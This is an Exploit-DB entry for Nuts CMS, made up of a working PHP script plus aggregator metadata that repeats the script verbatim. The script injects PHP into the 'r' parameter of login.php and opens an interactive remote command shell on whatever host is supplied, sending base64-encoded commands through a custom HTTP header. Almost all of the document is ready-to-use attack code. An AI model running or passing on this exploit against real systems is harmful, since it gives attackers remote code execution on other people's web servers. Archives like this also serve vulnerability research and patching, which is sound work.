ID EDB-ID:37809
Type exploitdb
Reporter Yakir Wizman
Modified 2015-08-17T00:00:00
Description
Nuts CMS Remote PHP Code Injection / Execution. Webapps exploit for php platform
<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:
error_reporting(E_ALL);
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <path>");
echo("\nExample: php {$argv[0]} localhost /");
die();
}
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$path = $argv[2];
}
$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";
while(1) {
print "\nAnonymous@{$host}:~# ";
if(($cmd = trim(fgets(STDIN))) == "exit")
break;
preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
function http_send($host, $pack) {
if(!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}\n");
fwrite($sock, $pack);
return stream_get_contents($sock);
}
?>
{"id": "EDB-ID:37809", "hash": "25c37411ee3099bb6b85be4653cbc858", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Nuts CMS Remote PHP Code Injection / Execution", "description": "Nuts CMS Remote PHP Code Injection / Execution. Webapps exploit for php platform", "published": "2015-08-17T00:00:00", "modified": "2015-08-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/37809/", "reporter": "Yakir Wizman", "references": [], "cvelist": [], "lastseen": "2016-02-04T06:37:03", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-02-04T06:37:03"}, "dependencies": {"references": [], "modified": "2016-02-04T06:37:03"}, "vulnersScore": -0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/37809/", "sourceData": "<?php\r\n# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit\r\n# \r\n# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.\r\n# Nuts CMS is an open source solution that is freely available to everyone.\r\n#\r\n# Discovered by Yakir Wizman\r\n# Date 17/08/2015\r\n# Vendor Homepage\t: http://www.nuts-cms.com/\r\n# CVE\t\t\t\t: N/A\r\n# Description\t\t: Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).\r\n###\r\n# Exploit code:\r\n\r\nerror_reporting(E_ALL);\r\n\r\n$error[0] = \"[!] This script is intended to be launched from the cli.\";\r\n \r\nif(php_sapi_name() <> \"cli\")\r\n\tdie($error[0]);\r\n \r\nif($argc < 3) {\r\n\techo(\"\\nUsage : php {$argv[0]} <host> <path>\");\r\n\techo(\"\\nExample: php {$argv[0]} localhost /\");\r\n\tdie();\r\n}\r\n\r\nif(isset($argv[1]) && isset($argv[2])) {\r\n\t$host = $argv[1];\r\n\t$path = $argv[2];\r\n}\r\n\r\n$pack = \"GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\\r\\n\";\r\n$pack.= \"Host: {$host}\\r\\n\";\r\n$pack.= \"Cmd: %s\\r\\n\";\r\n$pack.= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1) {\r\n\tprint \"\\nAnonymous@{$host}:~# \";\r\n if(($cmd = trim(fgets(STDIN))) == \"exit\")\r\n\t\tbreak;\r\n\tpreg_match(\"/_nutCmsId_(.*)/s\", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\nfunction http_send($host, $pack) {\r\n\tif(!($sock = fsockopen($host, 80)))\r\n\t\tdie(\"\\n[-] No response from {$host}\\n\");\r\n\tfwrite($sock, $pack);\r\n\treturn stream_get_contents($sock);\r\n}\r\n?>", "osvdbidlist": ["126452"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}
